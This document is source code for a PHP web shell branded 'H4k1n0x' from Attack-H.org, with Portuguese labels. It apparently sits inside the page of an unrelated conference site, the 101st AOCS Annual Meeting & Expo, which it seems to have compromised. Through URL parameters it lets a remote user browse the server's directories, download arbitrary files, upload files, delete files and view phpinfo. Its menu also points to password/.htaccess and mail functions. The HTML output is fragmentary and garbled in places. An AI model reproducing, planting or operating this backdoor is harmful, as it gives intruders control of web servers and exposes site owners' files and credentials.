|
| |
|
|
|
|
| |
| 101st AOCS Annual Meeting & Expo |
|
| |
|
// www.Attack-H.org
//***********************************************
//*******************************************
//*************** B ******* ***************
//*************** Y ******* ***********
//*** H4k1n0x *** ******* **************
//*************** C ******* ******
//*************** O ******* **********
//*************** D H4k1n0x ************
//*************** E ***
//*************** ******* ******
//*************** R ******* ***********
//* BY: Code RED* E ******* ***************
//*************** D ******* *******
//*************** ******* **********
//***********************[ www.Attack-H.org ]********
//*********************************************
$varBar = '';
$t1 = '';<br />
$t2 = '';
$t3 = getenv("HTTP_HOST");
$s = $_GET["s"];
$cmd = $_GET["cmd"];
$Command = $_GET["Command"];
$Nome = $_GET["Nome"];
if ($cmd == 'input'){
$local = $_POST["local"];
header("Location: ".code("cmd=manager&dir=".$local."")."");
}
if ($cmd == 'phpinfo'){
if (print("H4k1n0x [ PHP INFO ]") AND @phpinfo()){
exit;
} else {
echo "H4k1n0x [ PHP INFO ]";
echo "";
exit;
} }
$dir = $_GET["dir"];
$software = getenv("SERVER_SOFTWARE");
if (@ini_get("safe_mode") OR strtolower(@ini_get("safe_mode")) == "on"){
$safemode = "ON (Seguro)";
} else {
$safemode = "OFF (Não Seguro)";
}
function code($link=''){
$cmds = array('cmd','Command','s','dir','ArquivoV');
$phpsl = $_SERVER['PHP_SELF'].'?';
$novo = explode('&',$link);
foreach($_GET as $Ch => $v){
$var = 1;
foreach($novo as $bar){
$exp = explode('=',$bar);
if($exp[0] == $Ch)$var=0;
}
if($var){if(!in_array($Ch,$cmds))$phpsl.="$Ch=$v&";}
}
$phpsl.=$link;
return $phpsl;
}
if ($cmd == 'baixar'){
$Arq = $_GET['Arquivo'];
@ob_clean();
$arquivoB = @file_get_contents($Arq);
header('Content-type: application/octet-stream');
header('Content-disposition: attachment; filename="'.$Nome.'";');
header('Content-length: '.strlen($arquivoB));
echo $arquivoB;
exit;
}
if ($cmd == 'excluir'){
if (@unlink($Command)){
} else {
echo "Arquivo não pode ser deletado";
} }
if ($cmd == 'ArquivoV'){
$Command = $_GET["Command"];
function VPgna($Command){
$ext = strtolower(substr($Command,strrpos($Command,'.')+1));
$src = array('php','php3','php4','phps','phtml','phtm','inc');
if(in_array($ext,$src))highlight_file($Command);
else echo ''.htmlspecialchars(@file_get_contents($Command)).' ';
} }
function permissao($is_file){
$perms = fileperms($is_file);
if (($perms & 0xC000) == 0xC000) {
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
echo $info;
}
if ($dir == ''){
$input = getcwd();
$dir1 = dir(".");
$dir2 = dir(".");
$is_dir1 = ".";
$is_file1 = ".";
} else {
$input = $dir;
$dir1 = @dir($dir);
$dir2 = @dir($dir);
$is_dir1 = $dir;
$is_file1 = $dir;
}
echo ''.$t1.'H4k1n0x [ '.$t3.' ]'.$t2.'
'.$varBar.'
|
!H4k1n0x!
[ www.Attack-H.org ] |
'.$varBar.'
Software: '.$software.'
Safe-mode: '.$safemode.'
Info: ';
$diretorioC = scandir($input);
$numeC = count($diretorioC) - 2;
echo ''.$numeC.'
Total |
'.$varBar.'
[ Manager
] [ Passwd .ht* ]
[ Mail ] [ ';?>','phpinfo','width=800,height=600,scrollbars=yes,scroll=yes');void(0);">
Info ] [ Sobre ] |
|
|
';
if ($cmd == 'manager'){
if ($Command == 'upload'){
$uploadL = $_POST["uploadL"];
$file = $_FILES["arquivo"];
if (move_uploaded_file($file["tmp_name"], "$uploadL/".$file["name"])) {
}else {
echo "Erro, o arquivo não pode ser enviado.";
} }
echo '
'.$varBar.'
|
Nome |
Tamanho |
Modificação |
Permissão |
Grupo |
Ferramentas |
';
while(@$dirs = $dir1->read()){
$is_dir = $is_dir1.'/'.$dirs;
if (is_dir($is_dir)){
echo '
[ D ]'.$dirs.' |
Pasta |
'.date("d/m/Y H:i:s",filemtime($is_dir)).' | '; ?>
|
| Abrir |
';
} }
while($arquivos = $dir2->read()){
$is_file = $is_file1.'/'.$arquivos;
if (is_file($is_file)){
echo '
[ A ]'.$arquivos.' |
'.filesize($is_file) . " bytes".' |
'; print date("d/m/Y H:i:s",filemtime($is_file)); echo ' |
'; echo permissao($is_file); echo ' |
'; echo $_ENV["APACHE_RUN_GROUP"] . ' / ' . $_ENV["APACHE_RUN_USER"]; echo ' |
Editar | Baixar
| Excluir |
';
} } echo '
|
